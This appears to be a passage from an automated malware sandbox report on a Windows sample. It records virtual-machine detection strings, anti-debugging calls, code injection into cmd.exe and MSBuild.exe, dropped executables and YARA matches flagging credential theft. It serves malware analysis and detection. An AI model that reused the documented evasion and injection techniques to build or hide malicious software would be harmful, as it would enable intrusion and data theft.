                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Standard without Hyper-V Full
                              Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Enterprise without Hyper-V Core
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                              Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                              Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                              Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Standard without Hyper-V Core
                              Source: u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: VMWARE_VIRTUAL
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Datacenter without Hyper-V Full
                              Source: TNQTc6Qmkg.exe, 00000000.00000002.2973180744.0000000005EF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Enterprise without Hyper-V Full
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareh
                              Source: MSBuild.exe, 0000000C.00000002.2976248238.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000002.2969616251.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80879
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80894
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80876
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI call chain: ExitProcess graph end nodegraph_1-81912
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80920
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80890
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80897
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80719
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_001ED15B VirtualProtect ?,-00000001,00000104,?,?,?,000000005_2_001ED15B
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416240
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]0_2_004139E7
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_042654B3 push dword ptr fs:[00000030h]0_2_042654B3
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CF0D90 mov eax, dword ptr fs:[00000030h]0_2_05CF0D90
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05D03C4E mov eax, dword ptr fs:[00000030h]0_2_05D03C4E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CF092B mov eax, dword ptr fs:[00000030h]0_2_05CF092B
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]1_2_00415DC0
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_00420AEA GetProcessHeap,0_2_00420AEA
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_00409C06 SetUnhandledExceptionFilter,0_2_00409C06
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EBE
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041073B
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CF9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_05CF9CDA
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CF9E6D SetUnhandledExceptionFilter,0_2_05CF9E6D
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05D009A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_05D009A2
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CFA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_05CFA125
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00419DC7 SetUnhandledExceptionFilter,1_2_00419DC7
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00417B4E
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004173DD
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6B0AB1F7
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6B0AB66C
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C79AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6C79AC62
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_001EC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_001EC1FD
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_001F6678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_001F6678
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeNtSetInformationThread: Direct from: 0x6AE1617C
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeNtQuerySystemInformation: Direct from: 0xE5BE4
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeNtSetInformationThread: Direct from: 0x6C75617CJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00415D00
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B111000Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 516008Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B111000
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 111F008
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.0.exe "C:\Users\user\AppData\Local\Temp\u3bs.0.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.3.exe "C:\Users\user\AppData\Local\Temp\u3bs.3.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: TrayNotifyWndShell_TrayWnd
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SVWU
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Shell_TrayWndtooltips_class32S
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_00409D1B cpuid 0_2_00409D1B
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0042086B
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: EnumSystemLocalesW,0_2_004170F1
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: EnumSystemLocalesW,0_2_004201F6
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: EnumSystemLocalesW,0_2_004201AB
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: EnumSystemLocalesW,0_2_00420291
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0042031E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,0_2_004174E4
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,0_2_0042056E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00420697
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0041FF33
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,0_2_0042079E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: EnumSystemLocalesW,0_2_05D104F8
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: EnumSystemLocalesW,0_2_05D1045D
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: EnumSystemLocalesW,0_2_05D10412
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,0_2_05D107D3
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,0_2_05D107D5
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,0_2_05D0774B
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_05D1019A
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_05D108FE
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: EnumSystemLocalesW,0_2_05D07358
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_05D10AD2
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: GetLocaleInfoW,0_2_05D10A05
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00414570
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040996D
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_004143C0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_004144B0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000F2DA6 _memset,GetVersionExW,5_2_000F2DA6
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 1.3.u3bs.0.exe.42d0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u3bs.0.exe.42d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.42a0e67.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6252, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6176, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPED
                              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6164, type: MEMORYSTR
                              Source: Yara matchFile source: 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 1.3.u3bs.0.exe.42d0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u3bs.0.exe.42d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.42a0e67.1.unpack, type: UNPACKEDPE
